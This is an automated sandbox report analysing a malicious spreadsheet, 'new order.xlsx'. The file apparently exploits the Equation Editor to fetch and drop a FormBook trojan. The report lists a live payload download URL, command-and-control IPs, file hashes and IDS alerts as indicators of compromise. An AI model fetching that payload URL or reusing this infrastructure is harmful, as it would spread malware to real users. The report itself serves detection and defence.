                                                                                                                http://www.soso.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.univision.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  Public

IP              Domain                   Country        ASN     ASN Name                   Malicious
199.59.242.153  www.globaltradeview.com  United States  395082  BODIS-NJUS                 true
34.102.136.180  thinking-diversity.com   United States  15169   GOOGLEUS                   false
103.155.80.130  unknown                  unknown        134687  TWIDC-AS-APTWIDCLimitedHK  true

                                                                                                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452636
Start date: 22.07.2021
Start time: 17:09:37
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: new order.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/13@4/3
EGA Information: Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 27.6% (good quality ratio 26.2%)
                                                                                                                                                  • Quality average: 71.1%
                                                                                                                                                  • Quality standard deviation: 29%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 77
                                                                                                                                                  • Number of non-executed functions: 58
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

Time      Type             Description
17:11:10  API Interceptor  100x Sleep call for process: EQNEDT32.EXE modified
17:11:14  API Interceptor  221x Sleep call for process: vbc.exe modified
17:11:55  API Interceptor  205x Sleep call for process: wlanext.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs


                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN


                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://103.155.80.130/kung/bin.exe
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.8123774663976793
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:d34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:94UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:3C7747E6D9F426944566A7CC7A5A2608
                                                                                                                                                  SHA1:146829010E3A61D52397CF8F08EFAC4C29BB4859
                                                                                                                                                  SHA-256:0295DFBAED0E54EE9EA659CCF39A71783994C92F80F7E3F98CBF878534E71017
                                                                                                                                                  SHA-512:F82B007083F360DD8EEB2D799F35004E393405B6FCF5088D29A74C229D428A97331A07DA106AC1B087D80325C28668C6167D2C59181C52B83F0281BE864387B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3515A697.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50113C60.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D8F69D3.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F7C9E9A.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97389FAC.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F241D1B.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.073078686684614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SO51L6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                  MD5:38F8AEF1B9B013E0B0068166B63A0E43
                                                                                                                                                  SHA1:A4DCB11C764BF5B40EE117A372735B2AFA0B55F7
                                                                                                                                                  SHA-256:6668AA81E5E7F205C8CD14960B057A1E3FE04D9591DC11157B3A652CA12EC34E
                                                                                                                                                  SHA-512:C7B6120132E3A8D0AA8C730283E8E695D770D2E740B7535AFEDE9E94E47F9431F12FBCDDB6A3BEBEE90A89E3DA30F31FC375B95EA822157CA71FD6501250550D
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D44E50E1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D54AA3BD.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E22CC16E.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\Desktop\~$new order.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.994753169045867
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:new order.xlsx
                                                                                                                                                  File size:1333760
                                                                                                                                                  MD5:d59accd992813d35bb00a4b3f84c4ffe
                                                                                                                                                  SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
                                                                                                                                                  SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
                                                                                                                                                  SHA512:7328ce416225e682b4b3f2c5c81427195144f3b030264d4a6dde967092b26165769bb87718843db8de6d56a6d1da3c8a2eb929f73b1c9720db3ca17a5fefad14
                                                                                                                                                  SSDEEP:24576:beO5efoW4hdgaEwAq4P1opC4O64Qgawpf0kkwgAEfH75:hFW4sasq4PONP4QoN7za75

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "new order.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Stream Path: EncryptedPackage
File Type: data
Stream Size: 1318984
Entropy: 7.99890686533
Base64 Encoded: True
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.52655354693
Base64 Encoded: False

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/22/21-17:11:01.858671 | TCP | 2019696 | ET TROJAN Possible MalDoc Payload Download Nov 11 2014 | 49167 | 80 | 192.168.2.22 | 103.155.80.130
07/22/21-17:12:26.881021 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:26.881021 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:26.881021 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 34.102.136.180
07/22/21-17:12:27.021442 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 34.102.136.180 | 192.168.2.22

                                                                                                                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Jul 22, 2021 17:11:03.502649069 CEST8049167103.155.80.130192.168.2.22
